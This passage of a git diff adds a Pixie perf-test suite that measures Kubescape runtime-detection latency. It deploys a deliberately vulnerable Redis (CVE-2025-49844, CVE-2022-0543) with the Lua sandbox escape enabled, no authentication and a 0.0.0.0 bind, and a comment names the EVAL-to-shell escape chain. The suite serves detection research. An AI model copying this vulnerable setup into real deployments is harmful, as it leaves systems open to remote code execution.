+    matchLabels:
+      app.kubernetes.io/name: postgres
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: postgres
+        app.kubernetes.io/part-of: sovereign-soc
+        # Pairs with postgres-sbob.yaml's `postgres-empty` profile so
+        # kubescape alerts from t=0. See feedback_kubescape_empty_profile.
+        kubescape.io/user-defined-profile: postgres-empty
+    spec:
+      containers:
+      - name: postgres
+        image: postgres:16-alpine
+        imagePullPolicy: IfNotPresent
+        ports:
+        - {name: pg, containerPort: 5432}
+        env:
+        - {name: POSTGRES_DB, value: appdb}
+        - {name: POSTGRES_USER, value: app}
+        - {name: POSTGRES_PASSWORD, value: app_password}
+        # Alpine's init script runs initdb in /var/lib/postgresql/data; we
+        # explicitly point PGDATA at a subpath so the mount root stays
+        # initdb-clean (postgres refuses to init in a non-empty dir).
+ - {name: PGDATA, value: /var/lib/postgresql/data/pgdata} + volumeMounts: + - {name: initdb, mountPath: /docker-entrypoint-initdb.d} + - {name: data, mountPath: /var/lib/postgresql/data} + resources: + requests: {cpu: 200m, memory: 256Mi} + limits: {cpu: "2", memory: 1Gi} + readinessProbe: + exec: + command: ["pg_isready", "-U", "app", "-d", "appdb"] + initialDelaySeconds: 5 + periodSeconds: 5 + volumes: + - name: initdb + configMap: {name: postgres-initdb} + - name: data + emptyDir: {} +--- +apiVersion: v1 +kind: Service +metadata: + name: postgres + namespace: redis + labels: + app.kubernetes.io/name: postgres + app.kubernetes.io/part-of: sovereign-soc +spec: + selector: + app.kubernetes.io/name: postgres + ports: + - {name: pg, port: 5432, targetPort: pg} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-client-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-client-sbob.yaml new file mode 100644 index 00000000000..7155c37d8fc --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-client-sbob.yaml @@ -0,0 +1,20 @@ +--- +# Empty user-defined ApplicationProfile for the redis-client container. +# See redis-sbob.yaml for the full rationale. Container name `client` +# matches redis-vulnerable.yaml's second Deployment. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: redis-client-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: client + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml new file mode 100644 index 00000000000..b7d355dc179 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-sbob.yaml @@ -0,0 +1,38 @@ +--- +# Empty user-defined ApplicationProfile for the vulnerable redis container. +# +# Why "empty" instead of the learned profile copied from the iximiuz playground: +# Kubescape's auto-learned profile starts in `status: learning` and only +# transitions to `completed` after ~5-10 min of observed traffic. Until the +# transition, R0001/R0002 don't fire — so the first ~half of a 20-min RUN +# window is "silent" and all alerts cluster at the end (verified empirically +# 2026-05-14: 75–82% of forensic_alert_count rows landed in the second half +# of the 2x/4x experiments). +# +# A *user-defined* empty profile + the matching pod label +# kubescape.io/user-defined-profile: redis-empty +# skips auto-learning and treats every syscall / exec / open / endpoint as +# unprofiled → R0002 et al. fire from t=0. Required for perf-measurement +# experiments where we want detection latency to be the variable of interest. +# +# The profile MUST exist before the pod starts (or the pod must restart +# after the profile is applied) — otherwise Kubescape falls back to +# auto-learning. PrerenderedDeploy applies all YAMLs in one shot in the +# order they appear in YAMLPaths, so list this file BEFORE +# redis-vulnerable.yaml in the WorkloadSpec. 
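+#
+# One way to verify the ordering held on a live cluster (hypothetical
+# check): the profile's creationTimestamp must predate the redis pod's
+# startTime:
+#   kubectl -n redis get applicationprofiles redis-empty \
+#     -o jsonpath='{.metadata.creationTimestamp}'
+#   kubectl -n redis get pod -l app.kubernetes.io/name=redis \
+#     -o jsonpath='{.items[0].status.startTime}'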
+apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: redis-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: redis # must match the container name in redis-vulnerable.yaml + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml new file mode 100644 index 00000000000..662c01d4908 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-vulnerable.yaml @@ -0,0 +1,212 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-vulnerable.yaml (Apache-2.0 licensed). +# +# Redis 7.2.10 — vulnerable to CVE-2025-49844 + CVE-2022-0543 +# +# CVE-2025-49844: Use-After-Free in Lua parser lparser.c (all Redis < 7.2.11) +# CVE-2022-0543: Lua sandbox escape via package.loadlib (Debian packaging issue) +# +# This uses a custom image built from Dockerfile.redis-vulnerable that patches +# the Lua sandbox to reproduce the CVE-2022-0543 condition, enabling full +# sandbox escape via EVAL → package.loadlib → io.popen → shell. +# +# Deploys into its own "redis" namespace with: +# Namespace, ServiceAccount, Role, RoleBinding, Deployment, Service +--- +apiVersion: v1 +kind: Namespace +metadata: + name: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/part-of: bob-cve-2025-49844 +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: redis + namespace: redis +rules: + - apiGroups: [""] + resources: ["pods"] + verbs: ["get", "list"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: redis + namespace: redis +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: redis +subjects: + - kind: ServiceAccount + name: redis + namespace: redis +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: redis-config + namespace: redis +data: + redis.conf: | + # Disable protected mode (no auth, no bind restriction) + protected-mode no + bind 0.0.0.0 + port 6379 + + # Persistence off — ephemeral for testing + save "" + appendonly no + + # Memory limit + maxmemory 256mb + maxmemory-policy allkeys-lru + + # Logging + loglevel notice +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + cve: CVE-2025-49844 +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis + template: + metadata: + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/version: "7.2.10" + # Pairs with redis-sbob.yaml's `redis-empty` profile so kubescape + # treats every observed behaviour as anomalous from t=0 (skip the + # ~5-10 min auto-learning window that otherwise bunches alerts at + # the end of the RUN). See feedback_kubescape_empty_profile. 
+ kubescape.io/user-defined-profile: redis-empty + spec: + serviceAccountName: redis + containers: + - name: redis + image: ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10 + command: ["redis-server", "/etc/redis/redis.conf"] + ports: + - containerPort: 6379 + name: redis + protocol: TCP + volumeMounts: + - name: config + mountPath: /etc/redis + readOnly: true + resources: + requests: + cpu: 250m + memory: 256Mi + limits: + cpu: "1" + memory: 512Mi + livenessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 5 + periodSeconds: 10 + readinessProbe: + exec: + command: ["redis-cli", "ping"] + initialDelaySeconds: 3 + periodSeconds: 5 + volumes: + - name: config + configMap: + name: redis-config +--- +apiVersion: v1 +kind: Service +metadata: + name: redis + namespace: redis + labels: + app.kubernetes.io/name: redis +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 6379 + targetPort: 6379 + protocol: TCP + name: redis +--- +# A second Service exposing Redis on a non-standard port (16379 → 6379). +# Used by the endpoint test: if the ApplicationProfile records port=0 (wildcard), +# connections on ANY port are considered "normal" — including this one. +# If the profile records only :6379, connections via :16379 should be anomalous. +apiVersion: v1 +kind: Service +metadata: + name: redis-alt-port + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/component: endpoint-test +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 16379 + targetPort: 6379 + protocol: TCP + name: redis-alt +--- +# Redis client pod — a separate workload that connects to Redis over the network. +# Attacks from this pod simulate a compromised application in the cluster: +# - Network traffic is real pod-to-pod (not port-forward from outside) +# - Node-agent sees the TCP connection in its eBPF hooks +# - Endpoint detection can verify port-based allowlisting +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis-client + namespace: redis + labels: + app.kubernetes.io/name: redis-client + app.kubernetes.io/component: endpoint-test +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis-client + template: + metadata: + labels: + app.kubernetes.io/name: redis-client + kubescape.io/user-defined-profile: redis-client-empty + spec: + containers: + - name: client + image: redis:7.2-alpine + command: ["sleep", "infinity"] + resources: + requests: + cpu: 50m + memory: 32Mi + limits: + cpu: 200m + memory: 64Mi diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-warmer.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-warmer.yaml new file mode 100644 index 00000000000..320231d54d6 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/redis-warmer.yaml @@ -0,0 +1,69 @@ +# redis-warmer — generates ambient RESP traffic to the redis Service so +# Pixie's stirling registers the redis_events table in Vizier's schema. +# +# Without this, the sovereign-soc experiment's ClickHouseExportLoadMetric +# fails at PxL compile time with: +# Compilation failed: 31:18 Table 'redis_events' not found +# because Pixie's PEM only adds a protocol-events table to the schema +# after observing at least one packet of that protocol. +# +# Design: +# - Separate pod (NOT an initContainer on redis-vulnerable) so the +# traffic crosses the pod-to-pod boundary on the node's network +# namespace, where stirling's eBPF probes can see it. 
+# - Image: redis:7-alpine — pinned, contains redis-cli, ~30 MB pull +# once on first deploy. +# - PING every 2 s. Negligible load, keeps the table alive across +# Pixie's 60 s table-aging window. +# - Deployment (1 replica) instead of Job so it stays up across the +# entire experiment duration, including BURNIN and RUN phases. +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis-warmer + namespace: redis + labels: + app.kubernetes.io/name: redis-warmer + app.kubernetes.io/part-of: sovereign-soc +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis-warmer + template: + metadata: + labels: + app.kubernetes.io/name: redis-warmer + # Tag this so Vector's filter rules can drop these alerts if + # the analyst wants to exclude warmer traffic from + # forensic_db.alerts. + kubescape.io/ignore: "true" + spec: + containers: + - name: redis-warmer + image: redis:7-alpine + imagePullPolicy: IfNotPresent + command: ["/bin/sh", "-c"] + args: + - | + set -e + # Tight retry loop until the redis Service is resolvable — + # the warmer can start before redis-vulnerable's pod is + # Ready (Deployment ordering is parallel by default). + until redis-cli -h redis -p 6379 -t 2 PING >/dev/null 2>&1; do + echo "waiting for redis service..." + sleep 1 + done + echo "redis reachable, beginning warm loop" + while true; do + redis-cli -h redis -p 6379 -t 2 PING >/dev/null || true + sleep 2 + done + resources: + requests: + cpu: 5m + memory: 8Mi + limits: + cpu: 50m + memory: 32Mi diff --git a/src/e2e_test/perf_tool/pkg/suites/metrics.go b/src/e2e_test/perf_tool/pkg/suites/metrics.go index aaa7d75bbd0..f431af7d933 100644 --- a/src/e2e_test/perf_tool/pkg/suites/metrics.go +++ b/src/e2e_test/perf_tool/pkg/suites/metrics.go @@ -37,6 +37,25 @@ var heapSizeScript string //go:embed scripts/http_data_loss.pxl var httpDataLossScript string +//go:embed scripts/clickhouse_export.pxl +var clickhouseExportScript string + +//go:embed scripts/clickhouse_read.pxl +var clickhouseReadScript string + +//go:embed scripts/forensic_alerts.pxl +var forensicAlertsScript string + +// ClickHouseOperatorPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the ClickHouse operator scraper at +// a different cluster (kubeconfig/kube_context). +const ClickHouseOperatorPromRecorderName = "clickhouse-operator" + +// KubescapeNodeAgentPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the kubescape node-agent scraper +// at a different cluster. +const KubescapeNodeAgentPromRecorderName = "kubescape-node-agent" + // ProcessStatsMetrics adds a metric spec that collects process stats such as rss,vsize, and cpu_usage. func ProcessStatsMetrics(period time.Duration) *pb.MetricSpec { return &pb.MetricSpec{ @@ -133,6 +152,169 @@ func ProtocolLoadtestPromMetrics(scrapePeriod time.Duration) *pb.MetricSpec { } } +// ClickHouseExportLoadMetric runs the clickhouse export PxL script on a tight +// period to drive load against the ClickHouse write path, and reports the +// row count of each export as a metric. sourceTable is the Pixie events +// table the script reads from (e.g. "http_events", "redis_events"); +// destTable is the ClickHouse destination table. Their column shapes must +// be compatible or Kelvin will crash on the first CH server-side column +// mismatch (see ClickHouseExportSinkNode TODO). 
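+//
+// A sketch of how a suite might wire this in (values are illustrative and
+// `specs` is a hypothetical []*pb.MetricSpec, not a field of any real suite):
+//
+//	specs = append(specs, ClickHouseExportLoadMetric(
+//		10*time.Second,          // collection period: export every 10s
+//		"tcp://clickhouse:9000", // placeholder DSN
+//		"redis_events",          // Pixie source table
+//		"redis_events",          // ClickHouse destination table
+//		30*time.Second,          // window: re-export the trailing 30s
+//	))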
+func ClickHouseExportLoadMetric(period time.Duration, dsn string, sourceTable string, destTable string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseExportScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "source_table": sourceTable, + "dest_table": destTable, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_export_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseReadLoadMetric runs the clickhouse read PxL script on a tight +// period to drive load against the ClickHouse read path, and reports the +// row count of each readback as a metric. +func ClickHouseReadLoadMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseReadScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_read_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseOperatorMetrics scrapes the Altinity clickhouse-operator's +// metrics-exporter sidecar (`ch-metrics` port 8888), which proxies per-shard +// ClickHouse server metrics. Named so the --prom_recorder_override CLI flag +// can point it at a different cluster via kubeconfig/kube_context. +func ClickHouseOperatorMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: ClickHouseOperatorPromRecorderName, + Namespace: "clickhouse", + MatchLabelKey: "app.kubernetes.io/name", + MatchLabelValue: "altinity-clickhouse-operator", + Port: 8888, + ScrapePeriod: types.DurationProto(scrapePeriod), + MetricNames: map[string]string{ + // Gauges: in-flight load on CH servers. + "chi_clickhouse_metric_Query": "clickhouse_active_queries", + "chi_clickhouse_metric_TCPConnection": "clickhouse_tcp_connections", + "chi_clickhouse_metric_HTTPConnection": "clickhouse_http_connections", + "chi_clickhouse_metric_MemoryTracking": "clickhouse_memory_tracking_bytes", + "chi_clickhouse_metric_BackgroundMergesAndMutationsPoolTask": "clickhouse_background_merge_tasks", + "chi_clickhouse_metric_PartsActive": "clickhouse_parts_active", + // Counters: throughput and errors. + "chi_clickhouse_event_Query": "clickhouse_queries_total", + "chi_clickhouse_event_InsertedRows": "clickhouse_inserted_rows_total", + "chi_clickhouse_event_SelectedRows": "clickhouse_selected_rows_total", + "chi_clickhouse_event_FailedQuery": "clickhouse_failed_queries_total", + "chi_clickhouse_event_NetworkSendBytes": "clickhouse_network_send_bytes_total", + "chi_clickhouse_event_NetworkReceiveBytes": "clickhouse_network_receive_bytes_total", + // Per-table gauges: storage-side pressure. 
+ "chi_clickhouse_table_parts_rows": "clickhouse_table_parts_rows", + "chi_clickhouse_table_parts_bytes": "clickhouse_table_parts_bytes", + }, + }, + }, + } +} + +// KubescapeNodeAgentMetrics scrapes the Kubescape node-agent DaemonSet +// (the component that runs eBPF hooks and emits runtime anomaly alerts). +// Metrics are exposed on port 8080 of pods with label `app=node-agent` in +// the `honey` namespace, matching the kubescape helm chart defaults. +// +// Named so the --prom_recorder_override CLI flag can point it at a +// different cluster via kubeconfig/kube_context. +func KubescapeNodeAgentMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: KubescapeNodeAgentPromRecorderName, + Namespace: "honey", + MatchLabelKey: "app", + MatchLabelValue: "node-agent", + Port: 8080, + ScrapePeriod: types.DurationProto(scrapePeriod), + // Whitelist is a superset: prometheus_recorder silently drops + // metrics that are not present in the source, so listing a + // candidate name that a particular kubescape version has not + // (yet) exposed is harmless. + MetricNames: map[string]string{ + // Standard Go/process exporters — always present. + "process_cpu_seconds_total": "kubescape_node_agent_cpu_seconds_total", + "process_resident_memory_bytes": "kubescape_node_agent_rss", + "process_virtual_memory_bytes": "kubescape_node_agent_vsize", + "go_goroutines": "kubescape_node_agent_goroutines", + // Kubescape-specific (names may vary across versions). + "kubescape_ruleengine_firing_alerts_total": "kubescape_firing_alerts_total", + "kubescape_ruleengine_applied_rules_total": "kubescape_applied_rules_total", + "kubescape_node_agent_events_seen_total": "kubescape_events_seen_total", + "kubescape_node_agent_events_dropped_total": "kubescape_events_dropped_total", + }, + }, + }, + } +} + +// ForensicAlertCountMetric runs a PxL script against the forensic +// ClickHouse cluster (via clickhouse_dsn=…) to count Kubescape anomaly +// alerts that Vector has landed in forensic_db.kubescape_logs. Emits one +// row per invocation with the total count over the windowed time range. +func ForensicAlertCountMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: forensicAlertsScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("alert_count", "forensic_alert_count"), + }, + }, + }, + }, + }, + } +} + func singleMetricOutputWithPodNodeName(col string, newName ...string) *pb.PxLScriptOutputSpec { metricName := col if len(newName) > 0 { diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl new file mode 100644 index 00000000000..895eb45a0b9 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl @@ -0,0 +1,47 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Exports a windowed slice of a Pixie events table to ClickHouse on every +# invocation, producing sustained load on the export path. px._pem_hostname() +# ensures the Map runs on the PEM so each row carries the correct hostname. +# +# source_table: the Pixie events table to read from (e.g. http_events, +# redis_events). dest_table: the ClickHouse destination table name. These +# must have compatible column shapes — exporting http_events rows to a +# pre-existing CH table created for redis_events will make the CH server +# reject the INSERT on the first column mismatch, and the clickhouse-cpp +# client will rethrow that as an uncaught std::exception, crashing Kelvin +# (see ClickHouseExportSinkNode TODO). + +import px + +df = px.DataFrame('{{.TemplateValues.source_table}}', start_time='-{{.TemplateValues.window}}') +df.hostname = px._pem_hostname() +px.export(df, px.otel.ClickHouseRows( + table='{{.TemplateValues.dest_table}}', + endpoint=px.otel.Endpoint( + url='{{.TemplateValues.dsn}}', + ), +)) + +# Emit one metric row per invocation so we can chart export cadence and row +# counts. The metric recorder will pick up row_count as a single metric. +metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-export-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'export_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl new file mode 100644 index 00000000000..8975e21e879 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Reads a windowed slice of http_events back from ClickHouse on every +# invocation, exercising the ClickHouse read path and Pixie's ClickHouse +# source plan. Emits a metric row reporting the number of rows returned so +# we can track read throughput. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# A light-weight aggregation ensures ClickHouse actually has to scan the +# window rather than just serving the first page of rows. 
+metric_df = df.groupby([]).agg(row_count=('time_', px.count))
+metric_df.timestamp = px.now()
+metric_df.node_name = px._exec_hostname()
+metric_df.pod = 'clickhouse-read-driver'
+metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']]
+px.display(metric_df, 'read_stats')
diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl
new file mode 100644
index 00000000000..ea67958f247
--- /dev/null
+++ b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl
@@ -0,0 +1,40 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# Counts Kubescape anomaly alerts that Vector has written into
+# forensic_db.kubescape_logs in the forensic ClickHouse cluster, windowed
+# on event_time. Emits one row per invocation with the total alert count
+# over the window; see the comment above the aggregation for why there is
+# no per-rule breakdown.
+
+import px
+
+df = px.DataFrame(
+    '{{.TemplateValues.table}}',
+    clickhouse_dsn='{{.TemplateValues.dsn}}',
+    start_time='-{{.TemplateValues.window}}',
+)
+
+# forensic_db.kubescape_logs has (per the demo's observe.pxl probe)
+# top-level columns: message, RuntimeK8sDetails, event_time. There is no
+# top-level RuleID column — the rule id lives inside the JSON `message`
+# payload. We just count total alerts in the window; per-rule breakdowns
+# are left to downstream analysis.
+df = df.agg(alert_count=('event_time', px.count))
+df.timestamp = px.now()
+df.node_name = px._exec_hostname()
+df.pod = 'forensic-alert-driver'
+df = df[['timestamp', 'node_name', 'pod', 'alert_count']]
+px.display(df, 'forensic_alert_stats')
diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl
new file mode 100644
index 00000000000..cdd2c39e354
--- /dev/null
+++ b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl
@@ -0,0 +1,25 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+# +# SPDX-License-Identifier: Apache-2.0 + +import px + +df = px.DataFrame('redis_events', start_time='-30s') +df.namespace = df.ctx['namespace'] +df = df[df.namespace == '{{.Namespace}}'] + +df = df.agg(count=('time_', px.count)) +df.success = (df.count > 0) +px.display(df[['success']]) diff --git a/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go new file mode 100644 index 00000000000..552e3891ce8 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go @@ -0,0 +1,483 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package suites + +import ( + // Embed import is required to use go:embed directive. + _ "embed" + "fmt" + "os" + "strings" + "text/template" + "time" + + "github.com/gogo/protobuf/types" + log "github.com/sirupsen/logrus" + + pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" +) + +// existingVizierWorkload returns a VizierSpec that skips the deploy/skaffold +// rebuild but still binds the existing cluster's UUID to the Pixie context. +// Used when SOC_VIZIER_EXISTING=1 — e.g., the local-ci.sh phase 9 path where +// Pixie is already running in `pl` and connected to AOCC over Tailscale. +// +// The single PxCLIDeploy step has empty Args (so it does NOT redeploy) but +// SetClusterID=true, which makes pxDeployImpl.Deploy() call `px get cluster +// --id` and feed the result into pxCtx.SetClusterID. Without that, every +// subsequent NewVizierClient call errors with "must call SetClusterID +// before calling NewVizierClient on Context" — observed as a silent +// healthcheck loop until the 10-min backoff times out. +func existingVizierWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "vizier", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Px{ + Px: &pb.PxCLIDeploy{ + SetClusterID: true, + }, + }, + }, + }, + Healthchecks: VizierHealthChecks(), + } +} + +// Paths are resolved relative to the pixie workspace root; run.go chdirs +// there at startup via BUILD_WORKSPACE_DIRECTORY / `git rev-parse +// --show-toplevel`, so the perf_tool binary always sees these files +// regardless of where the user invoked bazel run from. +const ( + sovereignSOCYAMLRoot = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc" +) + +//go:embed scripts/healthcheck/redis_data_in_namespace.pxl +var redisDataInNamespaceScript string + +// KubescapeVectorWorkload installs Kubescape (eBPF runtime-detection node +// agent + storage + operator) and Vector (DaemonSet shipping Kubescape node- +// agent logs into ClickHouse) on the experiment cluster. Manifests are +// pre-rendered from upstream Helm charts so PrerenderedDeploy can apply them +// statically — see k8s/sovereign-soc/helm-rendered/README.md for the +// re-render recipe. +// +// Treated as long-lived infrastructure (similar to the cert-manager +// prerequisite of the k8ssandra suite). 
All steps set +// SkipNamespaceDelete=true so teardown never tries to delete `honey` or +// `kube-system`. The first run installs; subsequent runs idempotently +// re-apply (Pixie's ApplyResources skips with IsAlreadyExists or falls +// through to Update). Manual cleanup is only required if you change the +// rendered YAML in a backwards-incompatible way. +// +// The workload is tagged with action_selector="infra" and the experiment +// schedules a START_WORKLOADS{Name:"infra"} action before +// START_METRIC_RECORDERS. That ordering is load-bearing: the kubescape +// node-agent's prometheus exporter is gated by a ConfigMap that this +// workload writes, and the perf_tool's prometheus recorder pre-flights +// port-forwards at recorder-start time. If recorders ran first, they +// would connect to an old node-agent pod with no listener on :8080 and +// the recorder would error out before the experiment even started +// measuring. +// +// Layout: +// 1. kubescape.rendered.yaml — honey namespace, main install + 5 CRDs at +// the top of the file (rendered with --include-crds so kubescape's +// `crds/` chart directory is emitted). +// 2. kubescape.rendered.kube-system.yaml — the one RoleBinding kubescape +// needs in kube-system (storage-auth-reader) for API aggregation auth. +// 3. kubescape-default-rules.yaml — the built-in runtime rule set. +// 4. vector.rendered.yaml — Vector DaemonSet + RBAC that tails Kubescape +// node-agent logs into forensic_db.kubescape_logs. Endpoint is the +// external forensic CH URL so any experiment cluster can write to it. +// SovereignSOCInfraSelector is the action_selector tagged onto the +// kubescape-vector workload so it runs in a dedicated START_WORKLOADS +// phase before START_METRIC_RECORDERS — see the docstring on +// KubescapeVectorWorkload. +const SovereignSOCInfraSelector = 